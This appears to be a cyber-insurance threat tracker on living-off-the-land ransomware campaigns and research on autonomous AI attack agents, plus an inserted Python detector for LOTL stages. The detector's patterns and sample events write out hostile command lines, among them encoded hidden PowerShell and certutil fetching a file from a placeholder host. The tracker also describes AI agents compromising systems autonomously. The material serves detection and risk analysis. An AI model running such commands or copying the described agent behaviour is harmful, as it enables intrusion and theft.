LOTL 2.0 Incident Tracker: Documented Cases of AI-Augmented Living-Off-the-Land Attacks (2025–2026)

Living document tracking confirmed and suspected cases of autonomous or AI-augmented LOTL attacks in the wild. Updated as new evidence emerges. Includes attack chain analysis, tradecraft observations, and underwriting takeaways for each incident.


This is a living document. As evidence of autonomous or AI-augmented LOTL attacks accumulates, we’ll update this tracker with new cases, analysis, and underwriting implications. Each entry documents the tradecraft observed, the degree of automation suspected, and the relevance to cyber insurance risk assessment.

Last updated: April 2026


How to Read This Tracker

Each incident is classified along two dimensions:

Automation Level:

  • 🟢 Human-operated, LOTL tradecraft — human attacker using LOLBINs; no AI involvement detected
  • 🟡 AI-assisted — human operator with AI tools supporting reconnaissance, payload generation, or tradecraft selection
  • 🔴 Suspected autonomous — indicators suggest agent-driven execution with minimal human oversight

Confidence:

  • Confirmed — publicly reported with technical analysis from credible sources
  • Assessed — based on analysis of public reporting; automation level inferred from tradecraft patterns
  • Speculative — indicators suggest possible AI involvement but evidence is limited

Active Campaigns

1. Storm-1175 / Medusa Ransomware Campaign

Period:      Active throughout 2025–2026
Targets:     Healthcare, education, technology sectors globally
Automation:  🟢 Human-operated, LOTL tradecraft
Confidence:  Confirmed
Sources:     Microsoft Threat Intelligence, multiple vendor reports

Attack Chain:

  1. Initial access via phishing emails with malicious attachments
  2. PowerShell execution for reconnaissance and payload delivery
  3. Credential harvesting using in-memory techniques
  4. Lateral movement via PsExec and Impacket
  5. Data exfiltration before encryption
  6. Ransomware deployment using batch scripts

LOTL Tools Used:

  • PowerShell (execution, recon, credential access)
  • PsExec (lateral movement)
  • Impacket (authentication manipulation, lateral movement)
  • Scheduled tasks (persistence)
  • Certutil (data staging and potential exfiltration)

Underwriting Significance: This campaign represents the current “baseline” of LOTL-dominant ransomware operations. While the execution is human-operated, the tradecraft is precisely the playbook that autonomous agents are being trained to replicate. Key observations:

  • Dwell time: Extended (days to weeks), but compression is expected as automation increases
  • Detection opportunity: The tradecraft is detectable with behavioral analytics, but most mid-market victims lacked this capability
  • Claims impact: Multiple insureds affected across the cyber market, contributing to frequency trends in healthcare and education

LOTL 2.0 Trajectory: This campaign’s tradecraft is the template for autonomous execution. Every tool and technique used here has been demonstrated in autonomous attack research frameworks.


2. Asian Critical Infrastructure Intrusion Campaign

Period:      Identified late 2025, ongoing
Targets:     Critical infrastructure — energy, transportation, telecommunications
Automation:  🟡 AI-assisted (assessed)
Confidence:  Assessed
Sources:     Government advisories, sector-specific threat intelligence

Attack Chain:

  1. Supply chain compromise for initial access to target environments
  2. Extended reconnaissance using native system tools
  3. Custom malware combined with modified open-source utilities
  4. LOLBIN maintenance for persistent, low-visibility access
  5. Slow, deliberate lateral movement across operational technology networks

LOTL Tools Used:

  • Native system administration tools for reconnaissance
  • Legitimate remote management software for persistence
  • Modified open-source tools (RedTeam tooling) for specific operations
  • Custom malware reserved for high-value operations only

Underwriting Significance: This campaign is significant because of the blended approach — custom malware for specific objectives, but LOLBINs for the majority of day-to-day operations within the target environment. This suggests:

  • Attackers are conserving custom tooling for when it’s truly needed (reducing detection risk)
  • LOLBIN operations are the default, not the fallback
  • The patience and operational security discipline are consistent with either highly skilled human operators or well-tuned autonomous agents

The automation assessment (🟡): The speed and consistency of operations across multiple targets, combined with the adaptive tradecraft, suggest some level of AI assistance. Full autonomous operation is not confirmed, but the tradecraft is consistent with agent-supported workflows.


3. RapidPen Research Demonstrations

Period:      Published 2025
Targets:     Research environments (demonstrated capability, not wild deployment)
Automation:  🔴 Fully autonomous
Confidence:  Confirmed (academic publication)

What Was Demonstrated: Full IP-to-shell compromise with no human intervention. Starting from only a target IP address, the agent performed:

  1. Automated reconnaissance and service enumeration
  2. Vulnerability identification and selection
  3. Exploit execution
  4. Post-compromise operations (privilege escalation, persistence)

Underwriting Significance: While this is a research demonstration rather than a wild incident, it’s important for underwriters because:

  • Capability is proven: The question is no longer “can agents do this?” but “when will it be widely deployed?”
  • Time-to-compromise: The autonomous execution significantly compresses the initial access phase
  • Adaptability: The agent adjusted its approach based on what it found — this is qualitatively different from static exploit scripts

LOTL 2.0 Connection: The post-compromise phase in RapidPen includes LOLBIN usage for privilege escalation and persistence — the exact tradecraft that makes autonomous LOTL operations viable.


4. AutoAttacker Post-Breach Automation

Period:      Published 2025
Targets:     Research environments (14 distinct attack scenarios)
Automation:  🔴 Fully autonomous
Confidence:  Confirmed (academic publication)

What Was Demonstrated: High success rate in automating 14 “hands-on-keyboard” post-breach techniques across different operating systems. The agent:

  • Made context-dependent decisions about which technique to use
  • Adapted when initial approaches failed
  • Maintained operational consistency across extended attack chains
  • Replicated the decision-making of a skilled human operator

Underwriting Significance: This research directly addresses the “post-breach” phase that matters most for cyber insurance claims:

  • Dwell time compression: The agent operates faster than human responders
  • Coverage implications: “Time to detect and respond” metrics in policies may need recalibration
  • Detection requirements: Only behavioral analytics and identity-based controls can distinguish agent-driven LOTL operations from legitimate administration
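As an added example that is not part of the tracker, the following Python script implements the behavioral check that the Storm-1175 entry (LOLBIN stages: PowerShell, certutil, PsExec, Impacket, scheduled tasks) and the AutoAttacker takeaways above call for: it classifies constructed process-creation events into those stages and reports hosts where several distinct stages land inside a short window, the dwell-time compression the tracker expects from automated execution. The host names, stage patterns and sample events are constructed assumptions; the wmiexec pattern models a commonly documented Impacket artifact, not a vendor rule.

```python
import re
from collections import defaultdict
from datetime import datetime

# Hypothetical stage rules modelled on the tools named in the entry (illustrative
# patterns, not any vendor's signatures); each maps a command line to one stage.
STAGES = {
    "powershell_encoded": re.compile(r"powershell.*\s-e(nc|ncodedcommand)?\s", re.I),
    "certutil_staging":   re.compile(r"certutil.*\s-(urlcache|decode)\b", re.I),
    "psexec_lateral":     re.compile(r"psexesvc\.exe|psexec(64)?\.exe", re.I),
    "impacket_wmiexec":   re.compile(r"cmd\.exe /Q /c .*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I),
    "schtasks_persist":   re.compile(r"schtasks.*\s/create\b", re.I),
}

def classify(cmdline):
    """Return the LOTL stage a process command line matches, or None."""
    for stage, pattern in STAGES.items():
        if pattern.search(cmdline):
            return stage
    return None

def find_chains(events, window_minutes=60, min_stages=3):
    """events: (iso_timestamp, host, cmdline). Returns (host, sorted stage
    names, span in minutes) for hosts whose distinct stages fit inside the
    window; a lone matching command, as routine admin work produces, is ignored."""
    hits = defaultdict(list)
    for ts, host, cmd in events:
        stage = classify(cmd)
        if stage:
            hits[host].append((datetime.fromisoformat(ts), stage))
    findings = []
    for host, items in hits.items():
        items.sort()
        stages = sorted({s for _, s in items})
        span = (items[-1][0] - items[0][0]).total_seconds() / 60
        if len(stages) >= min_stages and span <= window_minutes:
            findings.append((host, stages, round(span, 1)))
    return findings

# Constructed sample events: WS-114 shows a compressed chain; SRV-07 is a lone
# scheduled-task creation that should not fire on its own.
SAMPLE_EVENTS = [
    ("2026-03-02T09:00:05", "WS-114", "powershell.exe -nop -w hidden -enc AAAA"),
    ("2026-03-02T09:01:40", "WS-114", "certutil.exe -urlcache -split -f http://placeholder.invalid/s a.dat"),
    ("2026-03-02T09:03:12", "WS-114", "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1709370192 2>&1"),
    ("2026-03-02T09:04:50", "WS-114", "schtasks.exe /create /sc onlogon /tn Updater /tr C:\\Temp\\a.dat"),
    ("2026-03-02T14:22:00", "SRV-07", "schtasks.exe /create /sc daily /tn Backup /tr C:\\Scripts\\backup.cmd"),
]
```

Calling find_chains(SAMPLE_EVENTS) reports WS-114 with four distinct stages inside roughly five minutes and nothing for SRV-07; the same stages spread over days by a human operator would fall outside the window and need a longer baseline to correlate.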

Monitoring: Campaigns to Watch

These campaigns show LOTL-heavy tradecraft that may be approaching AI augmentation:

5. Akira Ransomware Variant Campaign

Period:      Active 2025–2026
Targets:     Broad — SMB to mid-market
Automation:  🟢 Human-operated, heavy LOTL
Watch For:   Accelerating operation speed, parallel targeting patterns

Akira operators have been among the most prolific users of LOTL techniques. The campaign uses VPN exploitation for initial access followed by extensive LOLBIN usage internally. If this group begins deploying autonomous agents, the frequency impact on the cyber market would be significant due to their broad targeting scope.

6. BlackSuit / Royal Ransomware Evolution

Period:      Evolving through 2025–2026
Targets:     Healthcare, manufacturing, education
Automation:  🟢 Human-operated, LOTL components
Watch For:   Adoption of AI-generated phishing for initial access, automated post-breach

The Royal/BlackSuit lineage has shown consistent evolution in tradecraft. Their use of LOLBINs for lateral movement and data staging is well-documented. The group’s willingness to adopt new techniques makes them a leading candidate for early adoption of agent-assisted operations.


Research Pipeline: Capabilities Not Yet Deployed

These demonstrated capabilities exist in research settings and are candidates for wild deployment:

Agent-Based Red Team Automation

Multiple research teams have published frameworks for autonomous red team operations. These frameworks combine LLM-based decision-making with established attack tools. The gap between research capability and criminal deployment is narrowing.

Autonomous Lateral Movement

Research on agent-driven lateral movement demonstrates the ability to navigate complex network topologies, adapt to encountered defenses, and maintain operational security — all without human direction.

Self-Modifying LOTL Chains

Emerging research on agents that modify their own attack chains based on encountered defenses. This goes beyond pre-programmed “if-then” logic to genuine adaptation — the agent learns from the target environment and adjusts its approach.


Underwriting Takeaways

For Current Portfolio Assessment

  1. Frequency assumption: The campaigns documented above support a +10–20% frequency adjustment for portfolios with significant mid-market exposure, reflecting the approaching commoditization of LOTL tradecraft.

  2. Severity monitoring: Current incidents show consistent severity levels (ransom demands, BI duration). The risk is primarily frequency-driven at this stage.

  3. Correlation risk: Storm-1175’s broad targeting demonstrates that a single threat group can generate correlated claims across a portfolio. Agent-driven operations will amplify this.

For Risk Selection

  1. Control prioritization: The documented attack chains confirm that behavioral analytics and identity-based controls are the most effective defenses against the observed tradecraft.

  2. Sector exposure: Healthcare and education remain heavily targeted sectors — the LOTL 2.0 evolution will likely expand targeting to previously lower-frequency sectors like professional services and retail.

For Claims and Forensics

  1. Investigation complexity: LOTL-dominant incidents generate more complex forensic investigations. Adjust expected forensic costs upward, especially for insureds without comprehensive logging.

  2. Attribution challenges: The “no custom malware” signature of LOTL operations makes attribution more difficult, which can complicate subrogation efforts and coverage disputes.


Update Log

April 2026:   Initial tracker published with 6 entries
Next update:  New incidents, campaign evolution analysis

This tracker is maintained as part of our LOTL 2.0 Series. Start from the beginning: Living-Off-the-Land 2.0 foundational analysis.

If you have threat intelligence relevant to this tracker, or want to discuss the underwriting implications for your portfolio, reach out to the Resiliently team.
